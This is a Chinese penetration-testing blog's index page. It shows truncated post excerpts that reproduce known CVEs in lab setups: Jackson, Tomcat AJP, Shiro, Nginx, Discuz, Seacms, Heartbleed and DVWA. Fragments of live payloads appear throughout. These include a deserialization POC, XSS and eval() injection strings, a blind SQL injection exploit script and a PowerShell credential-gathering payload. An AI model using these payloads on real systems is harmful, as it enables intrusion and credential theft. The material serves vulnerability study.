
渗透测试
haha13l4
生活,学习
展开
-
jackson-cve-2019-12384
jackson-cve-2019-12384当Jackson库对 JSON 进行反序列化的时候,存在反序列化漏洞,控制好反序列化的类,就能触发服务端请求伪造(SSRF)和远程代码执行漏洞(RCE)。漏洞原理和分析参考:运行漏洞环境:git clone https://github.com/cnsimo/vu1hub.gitcd vu1hub/jackson/CVE-2019-12384-RCE/docker-compose up -d服务器IP:192.168.88.13攻击机kali:1原创 2020-08-07 17:00:23 · 678 阅读 · 0 评论 -
jackson-cve-2017-7525
jackson-cve-2017-7525加上接受的内容格式会报错在tmp目录下面创建一个prove1.txt文件,创建文件的命令是加密的,怎么加密的我也不知道。POC{ "param": [ "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", { "transletBytecodes": [ "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQE原创 2020-08-07 16:50:02 · 621 阅读 · 0 评论 -
CNVD-2020-10487-Tomcat-Ajp-lfi
#!/usr/bin/env python#CNVD-2020-10487 Tomcat-Ajp lfi#by ydhcuiimport struct# Some references:# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.htmldef pack_string(s): if s is None: ret...原创 2020-04-22 17:26:00 · 1405 阅读 · 0 评论 -
Apache-shiro反序列化
使用docker搭建环境获取docker镜像docker pull medicean/vulapps:s_shiro_1重启dockersystemctl restart docker启动docker镜像:docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1访问:http://localhost:8081/ 环境搭建成功...原创 2020-04-22 16:57:42 · 1783 阅读 · 0 评论 -
XSS姿势——文件上传XSS
XSS姿势——文件上传XSS文件上传xss,一般都是上传html文件导致存储或者反射xss,一般文件内容都是html。1、把以下代码写入文件,后缀改成图片格式。<html> <body> <img src=1 onerror=alert(1)> </body></html>2、或者将后缀名改为htm...原创 2020-04-22 16:14:06 · 5168 阅读 · 1 评论 -
php代码漏洞
一 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:<?phpecho `dir`;?>二 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、in...原创 2019-10-22 16:07:23 · 696 阅读 · 0 评论 -
linux日志文件服务器的三种搭建方式
一、 Relp方式传送日志(高层服务,信息不损坏,基于TCP协议)1、 服务器配置1.1、安装relp服务Yum install rsyslog-relp1.2、编辑配置文件Vim /etc/rsyslog.conf1.3、开启传输端口监听Vim /etc/sysconfig/rsyslog1.4、重启日志服务Service rsyslog restart2、 客户端配...原创 2019-06-03 17:35:20 · 4095 阅读 · 0 评论 -
CVE-2019-0708:Windows RDP服务蠕虫级漏洞预警
CVE-2019-0708:Windows RDP服务蠕虫级漏洞预警0x00 漏洞说明2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017...原创 2019-07-15 11:55:51 · 567 阅读 · 0 评论 -
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
Discuz 7.x/6.x 全局变量防御绕过导致代码执行由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。漏洞复现安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][sm...原创 2019-07-15 11:57:45 · 1025 阅读 · 0 评论 -
Discuz!X ≤3.4 任意文件删除漏洞
Discuz!X ≤3.4 任意文件删除漏洞影响版本:Discuz!X ≤3.4漏洞复现访问http://your-ip/robots.txt可见robots.txt是存在的:[外链图片转存失败(img-Na16JIU5-1563163104782)(2.png)]注册用户后,在个人设置页面找到自己的formhash:[外链图片转存失败(img-Lh7j02hX-15631631047...原创 2019-07-15 12:00:32 · 3896 阅读 · 0 评论 -
Nginx文件名逻辑漏洞(CVE-2013-4547)
Nginx文件名逻辑漏洞(CVE-2013-4547)漏洞说明影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7我们只需要上传一个空格结尾的文件,即可使PHP解析之。我们可以请求如下URI:/test[0x20]/../admin/index.php,这个URI不会匹配上location后面的/admin/,也就绕过了其中的IP验证;但最后请求的是/test...原创 2019-07-15 12:02:09 · 1777 阅读 · 0 评论 -
MySQL添加、删除与授权
MySQL添加用户、删除用户与授权MySql中添加用户,新建数据库,用户授权,删除用户,修改密码(注意每行后边都跟个;表示一个命令语句结束):1.新建用户1.1 登录MYSQL:@>mysql -u root -p@>密码1.2 创建用户:mysql> insert into mysql.user(Host,User,Password) values(“localh...原创 2019-06-06 09:49:17 · 171 阅读 · 0 评论 -
linux 不同网实现自动获取ip地址
实验坏境:vmnet1和vmnet8两网卡一台linux虚拟机做网关一台linux虚拟机做中继一台linux虚拟机做dhcp服务器一台linux虚拟机做测试机一、 关闭vmnet1和vmnet8的dhcp服务二、 设置网关1、在添加一个网卡接口2、关闭防火墙3、设置网卡文件/etc/sysconfig/network-scripts4、设置eth15、设置e...原创 2019-05-28 17:37:23 · 1103 阅读 · 0 评论 -
如何判断数据库为access
**一、Access数据库结构**Access中包含以下系统表MSysAccessXML、MSysAces、MSysImexColumns、MSysObjects、MSysQueries、MSysRelationShips是微软自带的。其中,MSysObjects表中包含了所有数据库对象。但遗憾的是,Access数据库默认不允许访问这些表。二、是否为Access方法1在地址栏上显示...原创 2019-05-30 23:35:35 · 1086 阅读 · 0 评论 -
DVWA-----------XSS (stored)
XSS(存储型)长期存储于服务器端;一、low级别输入 1 提交输入存在存储型的xss,所以每次打开都会弹框。下面的都可以尝试登录
XSS(反射性)跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击;XSS可以盗取客户端cookie,将客户端重定向到第三方网站;一、low级别一、判断是否有xss漏洞输入 :北京输入:获取cookie,等等,反射型XSS,可利用性不大。二、medium级别没有反应,被过滤掉了尝试大小写转换说明被过...原创 2019-05-18 18:09:51 · 715 阅读 · 0 评论 -
DVWA-----------CSRF
CSRFCSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。CSRF:伪造用户请求发给服务器一、low级别1、抓包2、保存链接http:...原创 2019-05-18 17:06:21 · 226 阅读 · 0 评论 -
linux 全功能检测所有可疑用户
#/bin/bashwhile truedoecho "请选择以下功能!!!"echo "---------------------------------passwd-----------------------------------"echo "1、在桌面生成一个----非系统用户.txt"echo "2、在桌面生成一个----系统用户.txt"echo "3、在桌面生成一个-...原创 2019-05-27 19:40:39 · 1417 阅读 · 0 评论 -
Nginx越界读取缓存漏洞(CVE-2017-7529)
Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞原理参考阅读:https://cert.360.cn/detailnews.html?id=b879782fbad4a7f773b6c18490d67ac7http://galaxylab.org/cve-2017-7529-nginx整数溢出漏洞分析/Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件...原创 2019-07-15 12:03:45 · 1349 阅读 · 0 评论 -
Nginx 解析漏洞复现
Nginx 解析漏洞复现Nginx解析漏洞复现。版本信息:Nginx 1.x 最新版PHP 7.x最新版由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。增加/.php后缀,被解析成PHP文件:Docker搭建坏境上传图片解析成功,得到shell...原创 2019-07-15 12:04:50 · 567 阅读 · 0 评论 -
脏牛提权(cve-2016-5159)
漏洞范围:大于2.6.22版本 (2007年发行,到2016年10月18日修复)危害:低权限的用户可利用这一漏洞在本地进行提权原理:linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统提升权限,甚至可...原创 2019-07-22 23:33:31 · 23258 阅读 · 1 评论 -
python版本切换
本篇博文面向Linux用户,在Linux下(Ubuntu)下测试通过,Win用户嘛,……0x00 为什么需要有两个版本的PythonPython2和Python3不兼容是每个接触过Python的开发者都知道的事,虽说Python3是未来,但是仍然有很多项目采用Python2开发。Linux的许多发行版本(如Ubuntu)都会自带Python2.7,但是当我们准备开发一个Python3项目的时候...原创 2019-07-21 20:25:40 · 887 阅读 · 0 评论 -
设置代理池
(1)安装kali linux虚拟机,请使用桥接模式,如果使用nat模式,proxifier需要新建规则不代理VMware Workstation的流量。安装proxychains-ng,安装后的命令是proxychains4。apt-get purge proxychains #卸载原proxychainsgit clone https://github.com/rofl0r/proxych...转载 2019-07-21 20:15:03 · 3877 阅读 · 1 评论 -
XSS练习
0x00 function render (input) { return '<div>' + input + '</div>' }没有丝毫的过滤,且在标签中很简单直接写payload <script>alert(1)</script>0x01function render (input) { return...原创 2019-07-21 16:35:00 · 911 阅读 · 0 评论 -
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)Tomcat版本:8.5.19Apache Tomcat 7.0.0 - 7.0.79漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件:<servlet> <servlet-name>default</servlet-name> ...原创 2019-07-25 08:36:14 · 1903 阅读 · 0 评论 -
mysql布尔盲注exp直接爆数据
import requestsimport re#作者:wf#当前网站的数据库长度def database_len(): for i in range(30): database_len_url=f"{main_url}' and length(database())={i}--+" print(database_len_url) h...原创 2019-06-30 20:52:05 · 587 阅读 · 0 评论 -
CVE-2018-9995摄像头
一、漏洞介绍DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机。最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。二、复现过程1、搜索引擎搜索使用DVR设备的网站或服务器Shodan/zoomeye: “GNU rsp/1.0” 或 ...原创 2019-07-15 12:28:43 · 1485 阅读 · 0 评论 -
Weblogic--CVE-2017-10271
Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。环境搭建启动测试环境:docker-compose up -d等待一...原创 2019-07-15 12:16:38 · 450 阅读 · 0 评论 -
struts S2-005 远程代码执行漏洞
S2-005 远程代码执行漏洞影响版本: 2.0.0 - 2.1.8.1漏洞详情: http://struts.apache.org/docs/s2-005.html原理参考吴翰清的《白帽子讲Web安全》一书。s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OG...原创 2019-07-15 12:14:41 · 2340 阅读 · 0 评论 -
Seacms
Payload1:http://192.168.88.147/sea/upload/search.php?searchtype=5&tid=&area=eval($_POST[123])Payload2:只有读取权没有写入权限http://192.168.88.147/sea/upload/search.php?searchtype=5&searchword={i...原创 2019-07-15 12:12:53 · 656 阅读 · 0 评论 -
openssl心脏滴血漏洞
Heartbleed漏洞,这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。简单理解:OpenSSL:没有检测心跳包中的长度字段是否和后续的数据字段相符合...原创 2019-07-15 12:09:06 · 5037 阅读 · 0 评论 -
OpenSSH--CVE-2018-15473
OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。利用docker坏境环境启动后,我们在客户端执行ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@your-ip -p20022,输入密码vulhub,即可登录到容器中。漏洞复现使用CVE-201...原创 2019-07-15 12:06:38 · 2066 阅读 · 0 评论 -
DVWA-----------command injection
命令注入解释:命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一;连接符: && & |1、command1 && command2第一个命令执行成功后才会执行第二个命令,否则不执行;2、command1 & command2不管前面的命令...原创 2019-05-18 14:04:55 · 278 阅读 · 0 评论 -
DVWA-----------Brute Fource
Brute Fource(暴力破解)暴力破解一般是指穷举法,顾名思义,暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。理论上来说,只要字典足够庞大,枚举总是能够成功的!但实际发送的数据并不像想象中的那样简单——“ 每次只向服务器发送用户名和密码字段即可!”,实际情况是每次发送的数据都必须要封装成完整的 HTTP 数据包才能被服务器接收。但是你不可能一个一个...原创 2019-05-18 12:49:27 · 247 阅读 · 0 评论 -
DVWA-----------sql盲注
SQL盲注的类型:基于布尔值的盲注基于时间的盲注基于报错的盲注SQL盲注的过程:1、判断是否存在注入2、猜解当前数据库名:长度和名称3、猜解数据库中的表名:长度和名称,表的数量4、猜解表中的字段名:长度和名称,字段数5、猜解数据一、low级别正常回显错误回显1、判断是否有注入点输入1 and 1=1,正常回显输入1 and 1=2,正常回显不属于数字型,采用字符...原创 2019-05-18 01:22:09 · 493 阅读 · 0 评论 -
nmap常用命令详细总结(思维导图总结)
nmap1、nmap语法2、nmap主机发现3、探测网络4、指纹识别与探测5、伺机而动6、防火墙/IDS逃逸7、信息收集8、数据路渗透测试9、渗透测试10、nmap技巧11、nmap保存和输出1、nmap语法2、nmap主机发现3、探测网络4、指纹识别与探测5、伺机而动6、防火墙/IDS逃逸7、信息收集8、数据路渗透测试9、渗透测试...原创 2019-05-02 14:43:57 · 1388 阅读 · 0 评论 -
渗透测试步骤总结(思维导图整理)
渗透测试一、信息收集1、域名信息收集2、服务器、组件(指纹)3、信息泄露4、总结二、漏洞挖掘1、组件(指纹)2、服务器3、应用层三、漏洞利用四、权限提升五、后门六、日志清扫七、经验总结思维导图链接:https://pan.baidu.com/s/1zlh_2D4HCGQ5c6dJ_FFD8w提取码:b21u...原创 2019-05-01 14:08:31 · 3660 阅读 · 1 评论 -
windows server2003 如何搭建asp网站环境
1、在控制面板打开 添加或删除程序2、添加或删除windows组件。 这个过程有点慢。3、选择应用程序服务器,点击下一步。4、打开管理工具中的Internet信息服务(IIS)管理器, 可以发送到桌面方便以后使用。5、开始配置IIS管理器,下载一套网站源码来搭建我们的网站。右键网站—新建—网站网站源码链接https://pan.baidu.com/s/1YXG8W5AEP0C...原创 2019-04-26 01:08:24 · 1830 阅读 · 0 评论 -
十分钟教你写个软件防火墙!powershell。
首先,打开记事本,输入你要限制运行的程序清单,注意一个程序一行,只输入程序名,不输入文件后缀,以记事本和火狐为例,格式见下图,输入完成后保存为black.txt。代码保存为xxx.ps1$process_name=type .\black.txtwhile ($true) { $processes = Get-Process foreach ($i in $proces...翻译 2019-04-27 00:24:28 · 1289 阅读 · 0 评论 -
powershell windows提权,查看用户密码。
代码保存为xx.ps1function Get-Information {<#.SYNOPSISNishang Payload which gathers juicy information from the target.有效载荷,从目标收集有趣的信息.DESCRIPTION这个有效负载从registry和一些命令中提取信息。This payload extracts ...翻译 2019-04-27 15:29:11 · 4552 阅读 · 2 评论